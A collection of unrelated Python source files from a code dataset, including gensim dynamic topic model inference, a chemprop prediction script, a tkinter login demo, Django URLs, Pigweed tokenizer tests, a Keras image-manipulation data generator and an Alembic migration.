(np.array(x) for x in zip(*[self.compute_post_mean(w, self.chain_variance) for w in range(0, w)]))
self.zeta = self.update_zeta()
for w in range(0, w):
val += (self.variance[w][0] - self.variance[w][t]) / 2 * chain_variance
logger.info("Computing bound, all times")
for t in range(1, t + 1):
term_1 = 0.0
term_2 = 0.0
ent = 0.0
for w in range(0, w):
m = self.mean[w][t]
prev_m = self.mean[w][t - 1]
v = self.variance[w][t]
# w_phi_l is only used in Document Influence Model; the values are always zero in this case
# w_phi_l = sslm.w_phi_l[w][t - 1]
# exp_i = np.exp(-prev_m)
# term_1 += (np.power(m - prev_m - (w_phi_l * exp_i), 2) / (2 * chain_variance)) -
# (v / chain_variance) - np.log(chain_variance)
term_1 += \
(np.power(m - prev_m, 2) / (2 * chain_variance)) - (v / chain_variance) - np.log(chain_variance)
term_2 += sstats[w][t - 1] * m
ent += np.log(v) / 2 # note the 2pi's cancel with term1 (see doc)
term_3 = -totals[t - 1] * np.log(self.zeta[t - 1])
val += term_2 + term_3 + ent - term_1
return val
def update_obs(self, sstats, totals):
"""Optimize the bound with respect to the observed variables.
TODO:
This is by far the slowest function in the whole algorithm.
Replacing or improving the performance of this would greatly speed things up.
Parameters
----------
sstats : numpy.ndarray
Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the first
time slice, expected shape (`self.vocab_len`, `num_topics`).
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
Returns
-------
(numpy.ndarray of float, numpy.ndarray of float)
The updated optimized values for obs and the zeta variational parameter.
"""
OBS_NORM_CUTOFF = 2
STEP_SIZE = 0.01
TOL = 1e-3
W = self.vocab_len
T = self.num_time_slices
runs = 0
mean_deriv_mtx = np.resize(np.zeros(T * (T + 1)), (T, T + 1))
norm_cutoff_obs = None
for w in range(0, W):
w_counts = sstats[w]
counts_norm = 0
# now we find L2 norm of w_counts
for i in range(0, len(w_counts)):
counts_norm += w_counts[i] * w_counts[i]
counts_norm = np.sqrt(counts_norm)
if counts_norm < OBS_NORM_CUTOFF and norm_cutoff_obs is not None:
obs = self.obs[w]
norm_cutoff_obs = np.copy(obs)
else:
if counts_norm < OBS_NORM_CUTOFF:
w_counts = np.zeros(len(w_counts))
# TODO: apply lambda function
for t in range(0, T):
mean_deriv = mean_deriv_mtx[t]
mean_deriv = self.compute_mean_deriv(w, t, mean_deriv)
mean_deriv_mtx[t] = mean_deriv
deriv = np.zeros(T)
args = self, w_counts, totals, mean_deriv_mtx, w, deriv
obs = self.obs[w]
model = "DTM"
if model == "DTM":
# slowest part of method
obs = optimize.fmin_cg(
f=f_obs, fprime=df_obs, x0=obs, gtol=TOL, args=args, epsilon=STEP_SIZE, disp=0
)
if model == "DIM":
pass
runs += 1
if counts_norm < OBS_NORM_CUTOFF:
norm_cutoff_obs = obs
self.obs[w] = obs
self.zeta = self.update_zeta()
return self.obs, self.zeta
def compute_mean_deriv(self, word, time, deriv):
"""Helper functions for optimizing a function.
Compute the derivative of:
.. :math::
E[\beta_{t,w}]/d obs_{s,w} for t = 1:T.
Parameters
----------
word : int
The word's ID.
time : int
The time slice.
deriv : list of float
Derivative for each time slice.
Returns
-------
list of float
Mean derivative for each time slice.
"""
T = self.num_time_slices
fwd_variance = self.variance[word]
deriv[0] = 0
# forward pass
for t in range(1, T + 1):
if self.obs_variance > 0.0:
w = self.obs_variance / (fwd_variance[t - 1] + self.chain_variance + self.obs_variance)
else:
w = 0.0
val = w * deriv[t - 1]
if time == t - 1:
val += (1 - w)
deriv[t] = val
for t in range(T - 1, -1, -1):
if self.chain_variance == 0.0:
w = 0.0
else:
w = self.chain_variance / (fwd_variance[t] + self.chain_variance)
deriv[t] = w * deriv[t] + (1 - w) * deriv[t + 1]
return deriv
def compute_obs_deriv(self, word, word_counts, totals, mean_deriv_mtx, deriv):
"""Derivation of obs which is used in derivative function `df_obs` while optimizing.
Parameters
----------
word : int
The word's ID.
word_counts : list of int
Total word counts for each time slice.
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
mean_deriv_mtx : list of float
Mean derivative for each time slice.
deriv : list of float
Mean derivative for each time slice.
Returns
-------
list of float
Mean derivative for each time slice.
"""
# flag
init_mult = 1000
T = self.num_time_slices
mean = self.mean[word]
variance = self.variance[word]
# only used for DIM mode
# w_phi_l = self.w_phi_l[word]
# m_update_coeff = self.m_update_coeff[word]
# temp_vector holds temporary zeta values
self.temp_vect = np.zeros(T)
for u in range(0, T):
self.temp_vect[u] = np.exp(mean[u + 1] + variance[u + 1] / 2)
for t in range(0, T):
mean_deriv = mean_deriv_mtx[t]
term1 = 0
term2 = 0
term3 = 0
term4 = 0
for u in range(1, T + 1):
mean_u = mean[u]
mean_u_prev = mean[u - 1]
dmean_u = mean_deriv[u]
dmean_u_prev = mean_deriv[u - 1]
term1 += (mean_u - mean_u_prev) * (dmean_u - dmean_u_prev)
term2 += (word_counts[u - 1] - (totals[u - 1] * self.temp_vect[u - 1] / self.zeta[u - 1])) * dmean_u
model = "DTM"
if model == "DIM":
# do some stuff
pass
if self.chain_variance:
term1 = - (term1 / self.chain_variance)
term1 = term1 - (mean[0] * mean_deriv[0]) / (init_mult * self.chain_variance)
else:
term1 = 0.0
deriv[t] = term1 + term2 + term3 + term4
return deriv
class LdaPost(utils.SaveLoad):
"""Posterior values associated with each set of documents.
TODO: use **<NAME>: Online Learning for Latent Dirichlet Allocation, NIPS 2010.**
to update phi, gamma. End game would be to somehow replace LdaPost entirely with LdaModel.
"""
def __init__(self, doc=None, lda=None, max_doc_len=None, num_topics=None, gamma=None, lhood=None):
"""Initialize the posterior value structure for the given LDA model.
Parameters
----------
doc : list of (int, int)
A BOW representation of the document. Each element in the list is a pair of a word's ID and its number
of occurences in the document.
lda : :class:`~gensim.models.ldamodel.LdaModel`, optional
The underlying LDA model.
max_doc_len : int, optional
The maximum number of words in a document.
num_topics : int, optional
Number of topics discovered by the LDA model.
gamma : numpy.ndarray, optional
Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
lhood : float, optional
The log likelihood lower bound.
"""
self.doc = doc
self.lda = lda
self.gamma = gamma
self.lhood = lhood
if self.gamma is None:
self.gamma = np.zeros(num_topics)
if self.lhood is None:
self.lhood = np.zeros(num_topics + 1)
if max_doc_len is not None and num_topics is not None:
self.phi = np.resize(np.zeros(max_doc_len * num_topics), (max_doc_len, num_topics))
self.log_phi = np.resize(np.zeros(max_doc_len * num_topics), (max_doc_len, num_topics))
# the following are class variables which are to be integrated during Document Influence Model
self.doc_weight = None
self.renormalized_doc_weight = None
def update_phi(self, doc_number, time):
"""Update variational multinomial parameters, based on a document and a time-slice.
This is done based on the original Blei-LDA paper, where:
log_phi := beta * exp(Ψ(gamma)), over every topic for every word.
TODO: incorporate lee-sueng trick used in
**<NAME>: Algorithms for non-negative matrix factorization, NIPS 2001**.
Parameters
----------
doc_number : int
Document number. Unused.
time : int
Time slice. Unused.
Returns
-------
(list of float, list of float)
Multinomial parameters, and their logarithm, for each word in the document.
"""
num_topics = self.lda.num_topics
# digamma values
dig = np.zeros(num_topics)
for k in range(0, num_topics):
dig[k] = digamma(self.gamma[k])
n = 0 # keep track of iterations for phi, log_phi
for word_id, count in self.doc:
for k in range(0, num_topics):
self.log_phi[n][k] = dig[k] + self.lda.topics[word_id][k]
log_phi_row = self.log_phi[n]
phi_row = self.phi[n]
# log normalize
v = log_phi_row[0]
for i in range(1, len(log_phi_row)):
v = np.logaddexp(v, log_phi_row[i])
# subtract every element by v
log_phi_row = log_phi_row - v
phi_row = np.exp(log_phi_row)
self.log_phi[n] = log_phi_row
self.phi[n] = phi_row
n += 1 # increase iteration
return self.phi, self.log_phi
def update_gamma(self):
"""Update variational dirichlet parameters.
This operations is described in the original Blei LDA paper:
gamma = alpha + sum(phi), over every topic for every word.
Returns
-------
list of float
The updated gamma parameters for each word in the document.
"""
self.gamma = np.copy(self.lda.alpha)
n = 0 # keep track of number of iterations for phi, log_phi
for word_id, count in self.doc:
phi_row = self.phi[n]
for k in range(0, self.lda.num_topics):
self.gamma[k] += phi_row[k] * count
n += 1
return self.gamma
def init_lda_post(self):
"""Initialize variational posterior. """
total = sum(count for word_id, count in self.doc)
self.gamma.fill(self.lda.alpha[0] + float(total) / self.lda.num_topics)
self.phi[:len(self.doc), :] = 1.0 / self.lda.num_topics
# doc_weight used during DIM
# ldapost.doc_weight = None
def compute_lda_lhood(self):
"""Compute the log likelihood bound.
Returns
-------
float
The optimal lower bound for the true posterior using the approximate distribution.
"""
num_topics = self.lda.num_topics
gamma_sum = np.sum(self.gamma)
# to be used in DIM
# sigma_l = 0
# sigma_d = 0
lhood = gammaln(np.sum(self.lda.alpha)) - gammaln(gamma_sum)
self.lhood[num_topics] = lhood
# influence_term = 0
digsum = digamma(gamma_sum)
model = "DTM" # noqa:F841
for k in range(0, num_topics):
# below code only to be used in DIM mode
# if ldapost.doc_weight is not None and (model == "DIM" or model == "fixed"):
# influence_topic = ldapost.doc_weight[k]
# influence_term = \
# - ((influence_topic * influence_topic + sigma_l * sigma_l) / 2.0 / (sigma_d * sigma_d))
e_log_theta_k = digamma(self.gamma[k]) - digsum
lhood_term = \
(self.lda.alpha[k] - self.gamma[k]) * e_log_theta_k + \
gammaln(self.gamma[k]) - gammaln(self.lda.alpha[k])
# TODO: check why there's an IF
n = 0
for word_id, count in self.doc:
if self.phi[n][k] > 0:
lhood_term += \
count * self.phi[n][k] * (e_log_theta_k + self.lda.topics[word_id][k] - self.log_phi[n][k])
n += 1
self.lhood[k] = lhood_term
lhood += lhood_term
# in case of DIM add influence term
# lhood += influence_term
return lhood
def fit_lda_post(self, doc_number, time, ldaseq, LDA_INFERENCE_CONVERGED=1e-8,
lda_inference_max_iter=25, g=None, g3_matrix=None, g4_matrix=None, g5_matrix=None):
"""Posterior inference for lda.
Parameters
----------
doc_number : int
The documents number.
time : int
Time slice.
ldaseq : object
Unused.
LDA_INFERENCE_CONVERGED : float
Epsilon value used to check whether the inference step has sufficiently converged.
lda_inference_max_iter : int
Maximum number of iterations in the inference step.
g : object
Unused. Will be useful when the DIM model is implemented.
g3_matrix: object
Unused. Will be useful when the DIM model is implemented.
g4_matrix: object
Unused. Will be useful when the DIM model is implemented.
g5_matrix: object
Unused. Will be useful when the DIM model is implemented.
Returns
-------
float
The optimal lower bound for the true posterior using the approximate distribution.
"""
self.init_lda_post()
# sum of counts in a doc
total = sum(count for word_id, count in self.doc)
model = "DTM"
if model == "DIM":
# if in DIM then we initialise some variables here
pass
lhood = self.compute_lda_lhood()
lhood_old = 0
converged = 0
iter_ = 0
# first iteration starts here
iter_ += 1
lhood_old = lhood
self.gamma = self.update_gamma()
model = "DTM"
if model == "DTM" or sslm is None:
self.phi, self.log_phi = self.update_phi(doc_number, time)
elif model == "DIM" and sslm is not None:
self.phi, self.log_phi = self.update_phi_fixed(doc_number, time, sslm, g3_matrix, g4_matrix, g5_matrix)
lhood = self.compute_lda_lhood()
converged = np.fabs((lhood_old - lhood) / (lhood_old * total))
while converged > LDA_INFERENCE_CONVERGED and iter_ <= lda_inference_max_iter:
iter_ += 1
lhood_old = lhood
self.gamma = self.update_gamma()
model = "DTM"
if model == "DTM" or sslm is None:
self.phi, self.log_phi = self.update_phi(doc_number, time)
elif model == "DIM" and sslm is not None:
self.phi, self.log_phi = self.update_phi_fixed(doc_number, time, sslm, g3_matrix, g4_matrix, g5_matrix)
lhood = self.compute_lda_lhood()
converged = np.fabs((lhood_old - lhood) / (lhood_old * total))
return lhood
def update_lda_seq_ss(self, time, doc, topic_suffstats):
"""Update lda sequence sufficient statistics from an lda posterior.
This is very similar to the :meth:`~gensim.models.ldaseqmodel.LdaPost.update_gamma` method and uses
the same formula.
Parameters
----------
time : int
The time slice.
doc : list of (int, float)
Unused but kept here for backwards compatibility. The document set in the constructor (`self.doc`) is used
instead.
topic_suffstats : list of float
Sufficient statistics for each topic.
Returns
-------
list of float
The updated sufficient statistics for each topic.
"""
num_topics = self.lda.num_topics
for k in range(0, num_topics):
topic_ss = topic_suffstats[k]
n = 0
for word_id, count in self.doc:
topic_ss[word_id][time] += count * self.phi[n][k]
n += 1
topic_suffstats[k] = topic_ss
return topic_suffstats
# the following functions are used in update_obs as the objective function.
def f_obs(x, *args):
"""Function which we are optimising for minimizing obs.
Parameters
----------
x : list of float
The obs values for this word.
sslm : :class:`~gensim.models.ldaseqmodel.sslm`
The State Space Language Model for DTM.
word_counts : list of int
Total word counts for each time slice.
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
mean_deriv_mtx : list of float
Mean derivative for each time slice.
word : int
The word's ID.
deriv : list of float
Mean derivative for each time slice.
Returns
-------
list of float
The value of the objective function evaluated at point `x`.
"""
sslm, word_counts, totals, mean_deriv_mtx, word, deriv = args
# flag
init_mult = 1000
T = len(x)
val = 0
term1 = 0
term2 = 0
# term 3 and 4 for DIM
term3 = 0
term4 = 0
sslm.obs[word] = x
sslm.mean[word], sslm.fwd_mean[word] = sslm.compute_post_mean(word, sslm.chain_variance)
mean = sslm.mean[word]
variance = sslm.variance[word]
# only used for DIM mode
# w_phi_l = sslm.w_phi_l[word]
# m_update_coeff = sslm.m_update_coeff[word]
for t in range(1, T + 1):
mean_t = mean[t]
mean_t_prev = mean[t - 1]
val = mean_t - mean_t_prev
term1 += val * val
term2 += word_counts[t - 1] * mean_t - totals[t - 1] * np.exp(mean_t + variance[t] / 2) / sslm.zeta[t - 1]
model = "DTM"
if model == "DIM":
# stuff happens
pass
if sslm.chain_variance > 0.0:
term1 = - (term1 / (2 * sslm.chain_variance))
term1 = term1 - mean[0] * mean[0] / (2 * init_mult * sslm.chain_variance)
else:
term1 = 0.0
final = -(term1 + term2 + term3 + term4)
return final
def df_obs(x, *args):
"""Derivative of the objective function which optimises obs.
Parameters
----------
x : list of float
The obs values for this word.
sslm : :class:`~gensim.models.ldaseqmodel.sslm`
The State Space Language Model for DTM.
word_counts : list of int
Total word counts for each time slice.
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
mean_deriv_mtx : list of float
Mean derivative for each time slice.
word : int
The word's ID.
deriv : list of float
Mean derivative for each time slice.
Returns
-------
list of float
The derivative of the objective function evaluated at point `x`.
"""
sslm, word_counts, totals, mean_deriv_mtx, word, deriv = args
sslm.obs[word] = x
sslm.mean[word], sslm.fwd_mean[word] = sslm.compute_post_mean(word, sslm.chain_variance)
model = "DTM"
if model == "DTM":
deriv = sslm.compute_obs_deriv(word, word_counts, totals, mean_deriv_mtx, deriv)
elif model == "DIM":
deriv = sslm.compute_obs_deriv_fixed(p.word, p.word_counts, p.totals, p.sslm, p.mean_deriv_mtx, deriv) # noqa:F821
return np.negative(deriv)
| StarcoderdataPython |
4868492 | from argparse import ArgumentParser
from chemprop.parsing import update_checkpoint_args
from chemprop.sklearn_predict import predict_sklearn
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--test_path', type=str, required=True,
help='Path to CSV file containing testing data for which predictions will be made')
parser.add_argument('--preds_path', type=str, required=True,
help='Path to CSV file where predictions will be saved')
parser.add_argument('--dataset_type', type=str, required=True, choices=['classification', 'regression'],
help='Type of dataset')
parser.add_argument('--model_type', type=str, choices=['random_forest', 'svm'], required=True,
help='scikit-learn model to use')
parser.add_argument('--checkpoint_path', type=str, default=None,
help='Path to model checkpoint (.pkl file)')
parser.add_argument('--checkpoint_dir', type=str, default=None,
help='Path to directory containing model checkpoints (.pkl file)')
parser.add_argument('--radius', type=int, default=2,
help='Morgan fingerprint radius')
parser.add_argument('--num_bits', type=int, default=2048,
help='Number of bits in morgan fingerprint')
parser.add_argument('--num_tasks', type=int, required=True,
help='Number of tasks the trained model makes predictions for')
args = parser.parse_args()
update_checkpoint_args(args, ext='pkl')
predict_sklearn(args)
| StarcoderdataPython |
1777421 | <gh_stars>0
# -*- coding:utf8 -*-
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def partition(self, head, x):
"""
:type head: ListNode
:type x: int
:rtype: ListNode
"""
less_than_head = less_than_tail = ListNode(None)
not_less_than_head = not_less_than_tail = ListNode(None)
now = head
nex = None
while now:
if now.val < x:
less_than_tail.next = now
less_than_tail = less_than_tail.next
else:
not_less_than_tail.next = now
not_less_than_tail = not_less_than_tail.next
nex = now.next
now.next = None
now = nex
less_than_tail.next = not_less_than_head.next
return less_than_head.next
| StarcoderdataPython |
6505641 |
import bs4
import dataclasses
import typing
@dataclasses.dataclass
class Tag():
name: str
def _scrape_tag(soup: bs4.BeautifulSoup) -> typing.List[Tag]:
elements = soup.find(class_='tag').find_all('a')[:-1]
return [Tag(e.text) for e in elements]
| StarcoderdataPython |
1762370 | <reponame>anliven/Reading-Code-Learning-Python
# -*- coding: utf-8 -*-
import tkinter
root = tkinter.Tk()
root.wm_title("Tkinter04 Demo")
label1 = tkinter.Label(root, text=u"账号:").grid(row=0, sticky="w")
label2 = tkinter.Label(root, text=u"密码:").grid(row=1, sticky="w")
label3 = tkinter.Label(root, text=u"")
var = tkinter.Variable()
var.set("tester")
entry1 = tkinter.Entry(root, textvariable=var) # textvariable属性绑定变量
entry2 = tkinter.Entry(root)
entry2["show"] = "*" # 设置show属性,实现“不可见输入”
entry1.grid(row=0, column=1, sticky="e")
entry2.grid(row=1, column=1, sticky="e")
label3.grid(row=3, column=1, sticky="w")
def reg():
str1, str2 = entry1.get(), entry2.get() # get()方法获取输入框的内容
if str1 == "root" and str2 == "password":
label3["text"] = u"登录成功"
else:
label3["text"] = u"用户名或密码错误"
entry1.delete(0, len(str1))
entry2.delete(0, len(str2))
btn = tkinter.Button(root, text=u"登录", command=reg)
btn.grid(row=2, column=1, sticky="e")
root.minsize(180, 80)
root.mainloop()
# ### grid布局
# grid()函数:
# - 参数row :指定位于的行,从0开始;
# - 参数column :指定位于的列,从0开始;
# - 参数sticky :组件开始的方向,“n,s,w,e”表示上下左右;
# - 参数ipadx和ipady :内边距的x方向与y方向,默认边距是0;
# - 参数padx和pady :外边距的x方向与y方向,默认边距是0;
# - 参数rowspan和columnspan :表示跨越的行数和列数;
#
# ### 注意
# pack布局和grid布局不能同时使用;
# 对于较复杂的布局,建议使用grid布局;
#
# ### 输入框(Entry)
# 获取输入的文本信息;
# 具体信息可查看源码文件__init__.py中的Entry类(“Python安装目录\Lib\tkinter\__init__.py”);
# get()方法获取输入框的内容,使用时不需要任何参数;
| StarcoderdataPython |
1636301 | # -*- coding:utf-8 -*-
"""
Weibo Api
"""
from django.urls import path
from weibo.views.weibo import (
WeiboCreateAPIView,
WeiboListAPIView,
WeiboDetailApiView
)
urlpatterns = [
# 前缀:/api/v1/weibo/weibo/
path("create", WeiboCreateAPIView.as_view(), name="create"),
path("list", WeiboListAPIView.as_view(), name="list"),
path("<int:pk>", WeiboDetailApiView.as_view(), name="detail"),
]
| StarcoderdataPython |
243605 | <gh_stars>0
#!/usr/bin/env python3
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests decoding a proto with tokenized fields."""
import unittest
from pw_tokenizer_tests.detokenize_proto_test_pb2 import TheMessage
from pw_tokenizer import detokenize, encode, tokens
from pw_tokenizer.proto import detokenize_fields
_DATABASE = tokens.Database(
[tokens.TokenizedStringEntry(0xAABBCCDD, "Luke, we're gonna have %s")])
_DETOKENIZER = detokenize.Detokenizer(_DATABASE)
class TestDetokenizeProtoFields(unittest.TestCase):
"""Tests detokenizing optionally tokenized proto fields."""
def test_plain_text(self) -> None:
proto = TheMessage(message=b'boring conversation anyway!')
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message, b'boring conversation anyway!')
def test_binary(self) -> None:
proto = TheMessage(message=b'\xDD\xCC\xBB\xAA\x07company')
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message, b"Luke, we're gonna have company")
def test_base64(self) -> None:
base64 = encode.prefixed_base64(b'\xDD\xCC\xBB\xAA\x07company')
proto = TheMessage(message=base64.encode())
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message, b"Luke, we're gonna have company")
def test_plain_text_with_prefixed_base64(self) -> None:
base64 = encode.prefixed_base64(b'\xDD\xCC\xBB\xAA\x09pancakes!')
proto = TheMessage(message=f'Good morning, {base64}'.encode())
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message,
b"Good morning, Luke, we're gonna have pancakes!")
def test_unknown_token_not_utf8(self) -> None:
proto = TheMessage(message=b'\xFE\xED\xF0\x0D')
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message.decode(),
encode.prefixed_base64(b'\xFE\xED\xF0\x0D'))
def test_only_control_characters(self) -> None:
proto = TheMessage(message=b'\1\2\3\4')
detokenize_fields(_DETOKENIZER, proto)
self.assertEqual(proto.message.decode(),
encode.prefixed_base64(b'\1\2\3\4'))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
105776 | import numpy as np
import keras
import json
from tqdm import tqdm
import cv2
import random
import matplotlib.pyplot as plt
from keras.applications.vgg16 import preprocess_input
from keras.preprocessing import image as keras_image
import pickle
def augment_patch(patch, augmentation):
if augmentation=='H-Flip':
augmented_patch = np.fliplr(patch)
elif augmentation=='V-Flip':
augmented_patch = np.flipud(patch)
elif augmentation=='180':
augmented_patch = np.rot90(patch, 2)
elif augmentation=='90':
augmented_patch = np.rot90(patch, 1)
elif augmentation=='270':
augmented_patch = np.rot90(patch, 3)
else:
augmented_patch = patch
return augmented_patch
def length(list_IDs, batch_size):
'Denotes the number of batches per epoch'
return int(np.floor(len(list_IDs) / batch_size))
def load_image_paths(image_categories):
with open('../train_pdfs.pkl', 'rb') as f:
pdfs = pickle.load(f)
with open('../from_scratch_classification.json', 'r') as f:
cls_type = json.load(f)
list_IDs = []
for doi in tqdm(pdfs):
for panel,cls in cls_type[doi].items():
if cls in image_categories:
path = '/nas/medifor/esabir/scientific_integrity/from_scratch/from_scratch_panels/'+doi+'/'+panel
list_IDs += [path]
return list_IDs
def on_epoch_end(list_IDs):
'Updates indexes after each epoch'
indexes = np.arange(len(list_IDs))
np.random.shuffle(indexes)
return indexes
def get_batch(indexes, index, list_IDs, batch_size, resize_dim, dim, n_channels, augmentation_list):
indexes = indexes[index*batch_size:(index+1)*batch_size]
# Find list of IDs
list_IDs_temp = [list_IDs[k] for k in indexes]
# Generate data
X, y, y1, y2 = data_generation(list_IDs_temp, batch_size, resize_dim, dim, n_channels, augmentation_list)
return X, y, y1, y2
def create_spliced_manipulation(img, resize_dim, augmentation_list):
img = cv2.resize(img, resize_dim)
h, w, ch = img.shape
new_h, new_w = int(np.ceil(h/16.)*16), int(np.ceil(w/16.)*16)
new_img = np.zeros((new_h, new_w, ch))
new_img[:h,:w,:] = img
mask_img = np.zeros_like(new_img)
duplicate = True
if duplicate:
dup1_r1 = random.randint(0,np.floor(0.75*new_h))
dup1_c1 = random.randint(0,np.floor(0.75*new_w))
dup1_r2 = random.randint(dup1_r1+10, dup1_r1+np.floor(0.25*new_h))
dup1_c2 = random.randint(dup1_c1+10, dup1_c1+np.floor(0.25*new_w))
assert np.floor(0.75*new_h)-dup1_r1>=0, 'Negative row for second patch!'
assert np.floor(0.75*new_w)-dup1_c1>=0, 'Negative col for second patch!'
augmentation = random.choice(augmentation_list)
dup2_r1 = random.randint(0, np.floor(0.75*new_h))
dup2_c1 = random.randint(0, np.floor(0.75*new_w))
if augmentation in ['0', '180', 'H-Flip', 'V-Flip']:
dup2_r2 = dup2_r1 + (dup1_r2-dup1_r1)
dup2_c2 = dup2_c1 + (dup1_c2-dup1_c1)
else:
dup2_r2 = dup2_r1 + (dup1_c2-dup1_c1)
dup2_c2 = dup2_c1 + (dup1_r2-dup1_r1)
assert dup2_r2<=new_h, 'Second patch row out of bounds!'
assert dup2_c2<=new_w, 'Second patch col out of bounds!'
#if random.choice([True, False]):
# patch = new_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,:]
# augmented_patch = augment_patch(patch, augmentation)
# new_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,:] = augmented_patch
#else:
patch = new_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,:]
augmented_patch = augment_patch(patch, augmentation)
new_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,:] = augmented_patch
dup_coord1 = (dup1_r1,dup1_r2,dup1_c1,dup1_c2)
dup_coord2 = (dup2_r1,dup2_r2,dup2_c1,dup2_c2)
mask_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,1] = 1
mask_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,0] = 1
mask_img[:,:,2] = 1
tmp = mask_img[:,:,1] + mask_img[:,:,0]
tmp[tmp>0] = 1
mask_img[:,:,2] = mask_img[:,:,2] - tmp
simi_mask = np.concatenate((mask_img[:,:,:1]+mask_img[:,:,1:2], mask_img[:,:,2:3]), axis=-1)
mani_mask = np.concatenate((mask_img[:,:,:1], mask_img[:,:,1:2]+mask_img[:,:,2:3]), axis=-1)
return new_img, mask_img, simi_mask, mani_mask
def unmanipulated(img, resize_dim):
img = cv2.resize(img, resize_dim)
gt_mask = np.zeros_like(img)
gt_mask[:,:,2] = 1
return img, gt_mask, gt_mask[:,:,:2], gt_mask[:,:,:2]
def create_manipulation(img, resize_dim, augmentation_list):
choices = ['Pristine', 'Splice']
choice = random.choice(choices)
if choice=='Pristine':
img, gt_mask, gt_mask1, gt_mask2 = unmanipulated(img, resize_dim)
elif choice=='Splice':
img, gt_mask, gt_mask1, gt_mask2 = create_spliced_manipulation(img, resize_dim, augmentation_list)
else:
print('Invalid choice!')
raise SystemExit
img = img[:,:,::-1]
return img, gt_mask, gt_mask1, gt_mask2
def data_generation(list_IDs_temp, batch_size, resize_dim, dim, n_channels, augmentation_list):
'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)
# Initialization
X = np.empty((batch_size, dim[0], dim[1], n_channels))
y = np.empty((batch_size, dim[0], dim[1], 3))
y1 = np.empty((batch_size, dim[0], dim[1], 2))
y2 = np.empty((batch_size, dim[0], dim[1], 2))
# Generate data
for i, ID in enumerate(list_IDs_temp):
# Store sample
img = cv2.imread(ID)
X[i], y[i], y1[i], y2[i] = create_manipulation(img, resize_dim, augmentation_list)
return X, y, y1, y2
def DataGenerator(image_categories, augmentation_list):
'Generates data for Keras'
dim = (256,256)
resize_dim = (256, 256)
batch_size = 32
list_IDs = load_image_paths(image_categories)
n_channels = 3
indexes = on_epoch_end(list_IDs)
while True:
for index in range(length(list_IDs, batch_size)):
X, y, y1, y2 = get_batch(indexes, index, list_IDs, batch_size, resize_dim, dim, n_channels, augmentation_list)
yield (X,y)
indexes = on_epoch_end(list_IDs)
| StarcoderdataPython |
3269145 | """empty message
Revision ID: a89df01c20eb
Revises:
Create Date: 2019-03-01 18:52:32.627154
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a89df01c20eb'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('db_info',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('md5', sa.String(length=128), nullable=True),
sa.Column('completed', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('cardstocollections',
sa.Column('card_id', sa.Integer(), nullable=True),
sa.Column('collection_id', sa.Integer(), nullable=True),
sa.Column('quantity', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['card_id'], ['card.id'], ),
sa.ForeignKeyConstraint(['collection_id'], ['collection.id'], )
)
op.add_column('cardstomainboard', sa.Column('quantity', sa.Integer(), nullable=True))
op.add_column('cardstosideboard', sa.Column('quantity', sa.Integer(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('cardstosideboard', 'quantity')
op.drop_column('cardstomainboard', 'quantity')
op.drop_table('cardstocollections')
op.drop_table('db_info')
# ### end Alembic commands ###
| StarcoderdataPython |
202620 | """
pysteps.cascade.interface
=========================
Interface for the cascade module.
.. autosummary::
:toctree: ../generated/
get_method
"""
from pysteps.cascade import decomposition, bandpass_filters
_cascade_methods = dict()
_cascade_methods['fft'] = (decomposition.decomposition_fft, decomposition.recompose_fft)
_cascade_methods['gaussian'] = bandpass_filters.filter_gaussian
_cascade_methods['uniform'] = bandpass_filters.filter_uniform
def get_method(name):
"""
Return a callable function for the bandpass filter or cascade decomposition
method corresponding to the given name. For the latter, two functions are
returned: the first is for the decomposing and the second is for recomposing
the cascade.
Filter methods:
+-------------------+------------------------------------------------------+
| Name | Description |
+===================+======================================================+
| gaussian | implementation of bandpass filter using Gaussian |
| | weights |
+-------------------+------------------------------------------------------+
| uniform | implementation of a filter where all weights are set |
| | to one |
+-------------------+------------------------------------------------------+
Decomposition/recomposition methods:
+-------------------+------------------------------------------------------+
| Name | Description |
+===================+======================================================+
| fft | decomposition into multiple spatial scales based on |
| | the fast Fourier Transform (FFT) and a set of |
| | bandpass filters |
+-------------------+------------------------------------------------------+
"""
if isinstance(name, str):
name = name.lower()
else:
raise TypeError("Only strings supported for the method's names.\n"
+ "Available names:"
+ str(list(_cascade_methods.keys()))) from None
try:
return _cascade_methods[name]
except KeyError:
raise ValueError("Unknown method {}\n".format(name)
+ "The available methods are:"
+ str(list(_cascade_methods.keys()))) from None
| StarcoderdataPython |
3599918 | #!/usr/bin/env python
'''
